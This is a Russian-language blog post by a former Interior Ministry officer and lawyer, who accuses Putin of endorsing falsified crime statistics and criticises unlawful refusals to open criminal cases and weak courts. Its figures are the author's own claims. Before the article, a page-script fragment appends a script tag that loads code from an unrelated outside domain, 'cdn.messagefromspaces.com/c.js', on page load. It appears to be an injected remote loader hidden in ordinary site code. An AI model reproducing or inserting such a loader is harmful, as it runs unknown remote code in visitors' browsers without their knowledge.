, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Зачем Путин и сам обманываться рад?

02 Мар

На расширенном заседании коллегии МВД России Путин подвёл http://kremlin.ru/events/president/news/59913  итоги работы Министерства внутренних дел России за прошлый год, обсудил текущие и долгосрочные задачи, в том числе с учётом тех подходов, которые были обозначены в недавнем Послании Федеральному Собранию.

Среди положительных тенденций 2018 года Путин сразу отметил «сокращение общего количества преступлений».

Но это уже на протяжении десятилетий не соответствует действительности. Словно не было исследований,  доказывающих, что  получают http://rapsinews.ru/judicial_analyst/20141202/272697983.html  защиту правоохранительных органов не более 10%, пострадавших от преступлений.

Словно Генеральный прокурор Юрий Чайка не говорил ничего о том, что не все пострадавшие от преступлений, получают статус потерпевший.  «Ежегодно прокуроры выявляют массу случаев, когда людям отказывают в приеме их заявлений о преступлениях при наличии бесспорных поводов и оснований для возбуждения уголовного дела. Отмененные прокурорами постановления об отказе в возбуждении уголовного дела исчисляются миллионами» — утверждает https://rg.ru/2015/01/12/chaika.html       Генеральный прокурор.

А среди этих миллионов неправомерных отказов есть сотни тысяч сообщений о коррумпированных деяниях чиновников, о лицах, что  обобирают сотни тысяч предпринимателей.

Такой неправомерной деятельностью можно создавать любые показатели о борьбе с  преступлениями, включая и взятки, и манипулировать ими, рассказывая обществу сказки.

Этому противится только Генеральный прокурор Юрий Чайка, которого, видимо, неслучайно не было на расширенном заседании коллегии МВД России.

Но поражает не это, а факт того, что о «сокращении общего количества преступлений» Путин рассказывает тем, кто достоверно знает, как она «фактически» сокращается. Это именно те люди, что миллионами неправомерно  выносят постановления об отказе в возбуждении уголовных дел.

Признавая такое «сокращение общего количества преступлений», гарант Конституции, как бы даёт добро  на продолжение подобной «работы».

Поэтому, при таких обстоятельствах, в любой момент может быть реализован призыв Путина: «последовательно добиваться снижения уровня преступности».

При таких обстоятельствах, в любой момент может быть реализован призыв Путина: «планомерно повышать уровень раскрываемости преступлений».

Если и сейчас из 12 000 000 криминальных проявлений, что регистрируются в стране, возбуждается только 2 000 000 уголовных дел, из которых половина прекращается по различным основаниям, то, как обширны возможности для докладов о том, что раскрываемость преступлений, т.е. установление лиц, причастных к преступлениям, приблизилась к 100%.

Тем более  что с 2015 года из статистического сборника «Состояние преступности в России», публикуемого на сайте МВД России для всеобщего доступа, исключен раздел «Сведения о результатах разрешения заявлений, сообщений и иной информации о происшествиях в органах внутренних дел».

Как это  негативно отразится на борьбе с преступностью, отмечено http://soprotivlenie.org/doc/rekomendacii-obshhestvennoj-palaty-rossijskoj-federacii-po-itogam-kruglogo-stola-na-temu-realizaciya-principov-ugolovnoj-politiki-v-sfere-zashhity-prav-postradavshix-ot-prestupnyx-posyagatelstv/   в Рекомендации Общественной палаты Российской Федерации.

Вот и не придётся Путину печалиться по поводу того, что «практически каждое второе преступление осталось нераскрытым».

Гарант Конституции публично говорит: «Знаю, что у каждого, что называется, «своя правда», она есть и у правоохранительной сферы, и подчас эта позиция не лишена здравого смысла, мягко говоря».

Если факт лжи по «сокращению общего количества преступлений», гарант Конституции Владимир Путин считает «своей правдой», то быть большой беде.

Ссылка на «свою правду» является своеобразной защитой тем, кто, придя на службу в МВД,  игнорирует требования Конституции и иных федеральных законов, кто становится подневольным своего начальства.

Как же при таких обстоятельствах «Служить Закону»?

Уже не раз писал о том, что подневольным http://forjustice.ru/rubric/zhizn-dokazyvaet-podnevolnym-chelovek-stanovitsya-sam.html   человек становится сам. Всегда есть выбор служить Закону или прислуживать начальнику.

Нечто подобное было в стране развитого социализма. Но, однажды и тем, кто прислуживал, рисуя радужные картины по борьбе с преступностью, не захотелось больше жить по лжи и поддерживать «ум, честь и совесть эпохи», правящую КПСС. Жизнь страны, построенная на лжи, развалила страну мгновенно.

Поражает наивность Путина по внедрению «специальной цифровой платформы», с помощью которой предприниматели смогут заявить о давлении на бизнес.

Путин полагает: «Это должна быть дополнительная помощь руководству соответствующей структуры, соответствующего министерства, для того чтобы до них напрямую, до руководителей доходили проблемы. Не через многочисленные фильтры подчинённых, в отношении которых, как правило и чаще всего, и направляются жалобы, а напрямую, и современные цифровые технологии позволяют это сделать достаточно эффективно, быстро и без промедления».

Запамятовал глава государства о том, что в своём послании в 2015 году,  он публично рассказывал, как обобрали 200 000 предпринимателей, возбудив неправомерно уголовные дела. И напрямую, именно Путин, давал поручения своим назначенцам разобраться с этим. Но «до них напрямую, до руководителей» дошли  указания главы государства, но кто и когда их исполнил?

Оказалось, что  пока Путин возмущался таким отношениям к предпринимателям, в 2015 году обобрали уже 230 предпринимателей.

Никакая «специальная цифровая платформа» не станет механизмом противодействия некомпетентности, халатности и должностным злоупотреблениям чиновников.

Во всём мире таким механизмом является правосудие, но с этим в России полная беда.

Третье десятилетие миллионы россиян не получают судебной защиты от незаконных и необоснованных действий, бездействия и решений органов власти и должностных лиц.

Формирующий состав исполнителей судебной власти Владимир Путин, так и не понял, в силу каких причин в стране отсутствует правосудие, как вид государственной деятельности, осуществляемой в особом порядке, установленном Конституцией и процессуальным законодательством.

Более того, игнорируя требования Конституции и порядок уголовного судопроизводства, пятнадцать лет тому назад, Путин подписал закон, позволяющий признавать виновным обвиняемого, что согласился с предъявленным ему обвинением, без исследования и оценки, собранных по делу доказательств.

Не только того обвиняемого, что был задержан непосредственно при совершении преступления, а любого, кто таковым и не был.

Фактически второе десятилетие в правоприменительной практике остаются невостребованными требования, предъявляемые к доказыванию и доказательствам. О каком умении по раскрываемости и доказыванию преступлений можно тогда рассуждать?

Генеральный прокурор Юрий Чайка уже не раз публично высказывался о том, что существующее упрощённое судопроизводство  ведёт к утрате знаний и навыков по доказательствам и доказыванию. Он утверждает: http://genproc.gov.ru/smi/interview_and_appearences/interview/547089/%20     «число допускаемых нарушений законодательства, в том числе конституционных прав граждан, не только не снижается, но и растет».

О низком качестве сбора и представления доказательств стороной обвинения, заговорила https://tocrypto.ru/news/olga-egorova-predsedatel-mosgorsuda-dala-intervyu/        и председатель Мосгорсуда Ольга Егорова.

А откуда качеству взяться, если в  стране, где не изжито  пыточное судопроизводство, осуждают около 70% подсудимых без исследования и проверки доказательств?

А, чего стоят вот эти суждения Путина: «И конечно, важно в целом наращивать усилия в борьбе с коррупцией. Жду от вас новых, современных, действенных подходов в выявлении и расследовании этих сложных, скрытых видов преступлений».

Все правоохранители и не только они, помнят  расследование дела такого коррупционера, как член Правительства России Улюкаев.

У министра экономического развития, что ни дня не работал в бизнесе, при обыске нашли имущество на миллиард.

Коррупционера осудили на 8 лет, оштрафовав всего на 130 млн. руб., а всё остальное вернули, забыв применить к его имуществу п.п. 8 п. 2 ст. 235 ГК РФ.

Сам Путин и его увешанные званиями и наградами помощники и эксперты, не понимают, как, не фальсификацией статистики, а правовой деятельностью, можно противодействовать криминальным проявлениям.

Оказалось, что это знает и может  мэр Москвы, Сергей Семенович Собянин, который утверждает https://www.sobyanin.ru/kak-sdelat-moskvu-bezopasnee   : «Задача  Правительства Москвы — создавать условия, в которых совершать преступления становится невыгодно и неудобно. И, безусловно, помогать полиции».

Поэтому я, как практикующий в Москве более 45 лет юрист, соглашусь с тем, что, улучшение освещения Москвы, дало свои результаты. Хищения путём грабежа и иных уличных преступлений снизилось более  чем в три раза.

Наведен порядок с  мигрантами, которые немало хлопот доставляли москвичам и гостям столицы. Фактически сегодня  около двух миллионов иностранцев не имеют право на въезд в Россию. Эти меры также уменьшили почти в два раза число преступлений, совершаемых  мигрантами.

Видеофиксация нарушений ПДД, дополненная функцией распознавания машин, находящихся в розыске, сделала угон машин слишком рискованным занятием. Количество краж автотранспорта снизилось в три раза.

Материалы видеонаблюдения используются в расследовании абсолютного большинства преступлений, совершаемых в Москве. Получает развитие функция распознавания лиц.

Это тоже даёт хорошие результаты. Количество квартирных краж снизилось почти в пять раз.

Но, в силу обстоятельств, связанных с неправомерными отказами в возбуждении уголовных дел, я не согласен с тем, что в 2010 году в Москве было зарегистрировано 186 тысяч преступлений, а в  2017 году  уже 140 тысяч.

Сегодня нет тех, кто «втыкал  в сознание» всем жить по установленным законам.

Даже при самовластии КПСС это удавалось Л.М. Карнеевой.  В.М. Савицкому,  И.И. Карпецу,  В.Н. Кудрявцеву.

Сегодня с ними некого рядом  поставить из увешанных званиями и наградами помощников и экспертов гаранта Конституции Владимира Путина.

Как можно говорить о правовом государстве, если Путин так и не осознал, что он гарант Конституции, что именно на нём лежит обязанность обеспечить исполнение воли народа, изложенной в Конституции России, а он так и не смог обеспечить исполнение требований статьи 2 Основного Закона:

«Человек, его права и свободы являются высшей ценностью. Признание, соблюдение и зашита прав и свобод человека и гражданина — обязанность государства».

Вместо предложений по  реальной борьбе с преступностью, нам россиянам, единственному источнику власти в стране, гарант Конституции рассказывает небылицы про «сокращение общего количества преступлений».

Мне, как прослужившему в МВД более 26 лет, имеющему три медали  «За безупречную службу» стыдно за такого гаранта Конституции.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.